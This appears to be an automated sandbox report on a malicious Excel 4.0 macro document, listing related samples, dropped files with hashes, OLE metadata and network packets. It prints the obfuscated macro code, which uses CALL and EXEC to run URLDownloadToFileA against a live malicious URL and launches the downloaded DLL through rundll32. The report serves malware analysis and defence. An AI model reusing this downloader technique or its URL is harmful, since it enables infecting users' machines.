• Payment advice IN18663Q0031139I.xlsx (malicious): 184.168.131.241
• Swift002.exe (malicious): 50.62.160.230
• 36ne6xnkop.exe (malicious): 184.168.131.241
• 56UDmImzPe.dll (malicious): 107.180.90.10
• Shipping doc&_B-Landen.exe (malicious): 50.62.137.41
• Statement-ID261179932209970.vbs (malicious): 148.72.208.50
• _.ryder.com._1602499153.666014.dll (malicious): 166.62.30.150
• mW07jhVxX5.exe (malicious): 184.168.131.241
• jEXf5uQ3DE.exe (malicious): 184.168.131.241

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:downloaded
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            IE Cache URL:http://living-traditions.com/blogs/click.php
                            C:\Users\user\AppData\Local\Temp\90DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):80628
                            Entropy (8bit):7.888145041366286
                            Encrypted:false
                            SSDEEP:1536:ZnC+ow5JeueA6rWGH3WdPMAeWRlMVGoIahaDHTU6hryF70Ki9h:ZnC+oQirW23WhMg2sTU2yF70KiD
                            MD5:B0C770DA6FFF46D0500CCF97D7CDA12A
                            SHA1:664AE1F31F2012830589FD05CB8798918F6F0219
                            SHA-256:3BF029B9AB1A47C8BB4C5EB0DF93AC234CFF71835AA2D9E58C342F3A1BBD29BA
                            SHA-512:C1A27AAFEB6D561E23AEC2CDFE4EDD527AC92214853020F37F2F41402E1389619173FDE9B67ECD04561CF9EC7BB28E01A9A0A6302855779103CC213138CC8591
                            Malicious:false
                            Reputation:low
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\446446.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=106496, window=hide
                            Category:dropped
                            Size (bytes):1984
                            Entropy (8bit):4.464349531148646
                            Encrypted:false
                            SSDEEP:24:8Dnbk/XTd6jFyPDVeMsODv3qcTdM7dD2Dnbk/XTd6jFyPDVeMsODv3qcTdM7dV:8s/XT0jFwDVmlWQh2s/XT0jFwDVmlWQ/
                            MD5:4348595ED5C238F3A7464C51D0660C8B
                            SHA1:E63FE61EDDE7BE6C9F33EBF482C9452B52F2657F
                            SHA-256:727289508032F34D8792E6DFD9DE538C64EEE1A0932ADB30431893A482159B92
                            SHA-512:67193929EBE343C53FDB503307E034CA17218201E337B5BECF8449D140FC81E065567F7641F4BFC51B35EACBBB852072B8C1A74E872EE9C997AF7C2B8A9607CB
                            Malicious:false
                            Reputation:low
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=8192, window=hide
                            Category:dropped
                            Size (bytes):867
                            Entropy (8bit):4.473944875294604
                            Encrypted:false
                            SSDEEP:12:85QD7LgXg/XAlCPCHaXtB8XzB/xqvX+WnicvbIsnbDtZ3YilMMEpxRljK3wXyTdK:85w/XTd6j6vYeMsbDv3qcTrNru/
                            MD5:0A126F4CE8A412A7E0B56FDD34D13F90
                            SHA1:205C7790F9A579AD5D87877D7D4A488A388B8AA8
                            SHA-256:9C63D6D21963E3AD8536BC4761DC624A4D7A490F608BFE2BDE5CC491B36C3606
                            SHA-512:B1A35E61AB7B52CFD5089807AE8B7EA604E52AFD6FE173EC324EACC8DDEC428A76ACF5024E8E41A030CAC311DBE52557D81A237DDEF72C953EE0F9C61A750386
                            Malicious:false
                            Reputation:low
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):71
                            Entropy (8bit):4.032792717761047
                            Encrypted:false
                            SSDEEP:3:oyBVomMJRT30YVo730YVomMJRT30YVov:dj6J1E4B46J1E4y
                            MD5:E9BA10F8D1524D050B02A3E80256C566
                            SHA1:950B596DB0C42E0A9B02ACEEB0166DACB72B96AE
                            SHA-256:8B69C0A0164EEC53F4F1BEAD5E95EBE38B27A23903D4D08570DBA040E6E93C0B
                            SHA-512:9E626D38996BF29D3616FDCDB6CDDA07B141054294512ADA00A2E18A250F682EB34D0C3CA75796170D096183329298C695F099EAF2DB6FDA1181364033C4B3F3
                            Malicious:false
                            Reputation:low
                            Preview: Desktop.LNK=0..[xls]..446446.LNK=0..446446.LNK=0..[xls]..446446.LNK=0..
                            C:\Users\user\Desktop\51DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Applesoft BASIC program data, first line number 16
                            Category:dropped
                            Size (bytes):138843
                            Entropy (8bit):6.821911851482883
                            Encrypted:false
                            SSDEEP:3072:e88rmjAItyzElBIL6lECbgBGGP5xLm7TD2jTUqyF70Ci6W2fXGUVxvfXGURH88rd:R8rmjAItyzElBIL6lECbgBvP5Nm7TUUJ
                            MD5:B68BAB90F3799DF7526E7FDF201A9D29
                            SHA1:50AFB3C63A6BD986AF93D8B15B8F783585FFC295
                            SHA-256:276BA2D933458EE7908C4B881C60C131A2CBDD8914ED4938DE68D74D10F95F78
                            SHA-512:D9CC208214B67AF0C5A0C84EB31B9975CB85F9392E63635CBA2946F7CC6B2F9D96434A05CF0C7A5D59ED92B8D8F18474FDDA68E8D120AA8F78DAD56635ACEF31
                            Malicious:false
                            Reputation:low
                            C:\Users\user\fdinmd.fii
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Apr 12 15:51:16 2021, Security: 0
                            Entropy (8bit):3.2150745788685295
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:446446.xls
                            File size:283136
                            MD5:1b62b4f4b16d6219dce4c6d145c5af79
                            SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
                            SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
                            SHA512:1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e
                            SSDEEP:6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "446446.xls"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1251
                            Last Saved By:5
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2021-04-12 14:51:16
                            Creating Application:Microsoft Excel
                            Security:0

                            Document Summary

                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.335261663834
                            Base64 Encoded:False
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.244430475899
                            Base64 Encoded:False
                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942
                            General
                            Stream Path:Book
                            File Type:Applesoft BASIC program data, first line number 8
                            Stream Size:270942
                            Entropy:3.18416886572
                            Base64 Encoded:True

                            Macro 4.0 Code

                            "=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(2151
51615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                            ,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32 

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 17:06:02.567907095 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.698780060 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.698952913 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.699388027 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.829914093 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888154984 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888185978 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888209105 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888232946 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888254881 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888258934 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888276100 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888279915 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888286114 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888300896 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888308048 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888324976 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888334990 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888350010 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888351917 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888376951 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:02.888387918 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.888410091 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:02.892734051 CEST | 49165 | 80 | 192.168.2.22 | 64.207.186.30
Apr 12, 2021 17:06:03.019260883 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
Apr 12, 2021 17:06:03.019337893 CEST | 80 | 49165 | 64.207.186.30 | 192.168.2.22
                            Apr 12, 2021 17:06:03.019397020 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019450903 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019454956 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019486904 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019503117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019509077 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019560099 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019568920 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019769907 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019773006 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019818068 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019830942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019881964 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019882917 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019932985 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019933939 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019979000 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019983053 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020030975 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020031929 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020078897 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020081997 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020129919 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020133018 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020179987 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020183086 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020230055 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.021414995 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151037931 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151130915 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151190996 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151252031 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151314020 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151315928 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151334047 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151384115 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151417971 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151444912 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151499987 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151503086 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151504993 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151562929 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151592970 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151622057 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151678085 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151679993 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151684046 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151738882 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151772976 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151808023 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151871920 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151876926 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151878119 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151936054 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.151964903 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.151994944 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152051926 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152054071 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152057886 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152112007 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152141094 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152170897 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152226925 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152228117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152230978 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152295113 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152333975 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152365923 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152420044 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152422905 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152426004 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152484894 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152518988 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152548075 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152578115 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152607918 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152667046 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152669907 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152676105 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152726889 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152755976 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152791977 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152848005 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152852058 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152858973 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152918100 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.152945995 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.152976990 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.153026104 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.153034925 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.153033972 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.153091908 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.153119087 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.153497934 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.154309988 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.283899069 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.283942938 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.283973932 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284002066 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284037113 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284069061 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.284153938 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.284161091 CEST804916564.207.186.30192.168.2.22
